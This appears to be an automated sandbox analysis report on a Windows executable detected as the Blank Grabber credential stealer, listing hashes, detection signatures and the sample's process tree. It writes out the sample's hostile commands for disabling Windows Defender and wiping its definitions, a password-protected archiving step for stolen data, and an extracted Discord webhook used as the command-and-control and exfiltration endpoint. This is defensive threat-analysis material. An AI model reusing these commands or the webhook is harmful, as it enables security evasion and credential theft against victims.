Windows
Analysis Report
riFSkYVMKB.exe
Overview
General Information

Field | Value
---|---
Sample name | riFSkYVMKB.exe (renamed because the original name is a hash value)
Original sample name | f139e085653967253d9a7159a3664dd986a69570540375d39a10df1fa49b8fe4.exe
Analysis ID | 1584120
MD5 | 90ee30fccafac811f40981a0e895d7f0
SHA1 | 1517871794b795207d8cfa243c44bda048dcf40d
SHA256 | f139e085653967253d9a7159a3664dd986a69570540375d39a10df1fa49b8fe4
Tags | exe, user-zhuzhu0009
Detection

Field | Value
---|---
Detection | Blank Grabber
Score | 100
Range | 0 - 100
Whitelisted | false
Confidence | 100%
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Removes signatures from Windows Defender
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Classification
Process tree (command lines de-garbled from the flattened listing; the nesting of cmd.exe and its children under the second riFSkYVMKB.exe instance is reconstructed from that listing, not shown explicitly in this extract):

- System is w10x64
- riFSkYVMKB.exe (PID: 5144, cmdline: `"C:\Users\user\Desktop\riFSkYVMKB.exe"`, MD5: 90EE30FCCAFAC811F40981A0E895D7F0)
  - riFSkYVMKB.exe (PID: 6800, cmdline: `"C:\Users\user\Desktop\riFSkYVMKB.exe"`, MD5: 90EE30FCCAFAC811F40981A0E895D7F0)
    - cmd.exe (PID: 6768, cmdline: `C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\riFSkYVMKB.exe'"`, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      - conhost.exe (PID: 6804, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
      - powershell.exe (PID: 5776, cmdline: `powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\riFSkYVMKB.exe'`, MD5: 04029E121A0CFA5991749937DD22A1D9)
    - WmiPrvSE.exe (PID: 7404, cmdline: `C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding`, MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    - cmd.exe (PID: 6012, cmdline: `C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"`, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      - conhost.exe (PID: 6892, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
      - powershell.exe (PID: 5676, cmdline: `powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend`, MD5: 04029E121A0CFA5991749937DD22A1D9)
      - MpCmdRun.exe (PID: 8024, cmdline: `"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All`, MD5: B3676839B2EE96983F9ED735CD044159)
    - cmd.exe (PID: 1512, cmdline: `C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"`, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      - conhost.exe (PID: 2820, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
      - tasklist.exe (PID: 7268, cmdline: `tasklist /FO LIST`, MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    - cmd.exe (PID: 4200, cmdline: `C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"`, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      - conhost.exe (PID: 7172, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
      - tasklist.exe (PID: 7292, cmdline: `tasklist /FO LIST`, MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    - cmd.exe (PID: 7476, cmdline: `C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI51442\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\0ddIp.zip" *"`, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      - conhost.exe (PID: 7492, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
      - rar.exe (PID: 7528, cmdline: `C:\Users\user\AppData\Local\Temp\_MEI51442\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\0ddIp.zip" *`, MD5: 9C223575AE5B9544BC3D69AC6364F75E)
    - cmd.exe (PID: 7580, cmdline: `C:\Windows\system32\cmd.exe /c "wmic os get Caption"`, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      - conhost.exe (PID: 7592, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
      - WMIC.exe (PID: 7672, cmdline: `wmic os get Caption`, MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    - cmd.exe (PID: 7716, cmdline: `C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"`, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      - conhost.exe (PID: 7732, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
      - WMIC.exe (PID: 7768, cmdline: `wmic computersystem get totalphysicalmemory`, MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    - cmd.exe (PID: 7800, cmdline: `C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"`, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      - conhost.exe (PID: 7816, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
      - WMIC.exe (PID: 7856, cmdline: `wmic csproduct get uuid`, MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    - cmd.exe (PID: 7888, cmdline: `C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"`, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      - conhost.exe (PID: 7900, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
      - powershell.exe (PID: 7948, cmdline: `powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER`, MD5: 04029E121A0CFA5991749937DD22A1D9)
    - cmd.exe (PID: 8048, cmdline: `C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"`, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      - conhost.exe (PID: 8064, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
      - WMIC.exe (PID: 8108, cmdline: `wmic path win32_VideoController get name`, MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    - cmd.exe (PID: 8148, cmdline: `C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"`, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      - conhost.exe (PID: 8164, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
      - powershell.exe (PID: 7020, cmdline: `powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault`, MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
Malware configuration (Malware Configuration Extractor):

{"C2 url": "https://discord.com/api/webhooks/1325008109688848394/ap33zUqBiGzDvwCP0tF85_LvY8CYm5iFLtVRNIJg4zgkMF4A54M4Y9NXhJ9mbH2Zi-eA"}
Yara matches

Source | Rule | Description | Author | Strings
---|---|---|---|---
(not preserved in this extract) | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |

Five further matches of the same rule (JoeSecurity_BlankGrabber, Yara detected Blank Grabber, Joe Security) on other sources were reported; the source column is not preserved in this extract.
System Summary

Sigma rule matches (rule names and matched events not preserved in this extract; authors as listed):
- Florian Roth (Nextron Systems)
- Florian Roth (Nextron Systems)
- @ROxPinTeddy
- Florian Roth (Nextron Systems)
- Timur Zinniatullin, E.M. Anhaus, oscd.community
- Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
No Suricata rule has matched
AV Detection

Sources reporting on the sample (detection values not preserved in this extract):
- Malware Configuration Extractor
- Virustotal
- ReversingLabs
- Integrated Neural Analysis Model

Further signature evidence (signature headings and values not preserved in this extract):
- Code function: 18_2_00007FF68A21901C
- Static PE information
- Binary string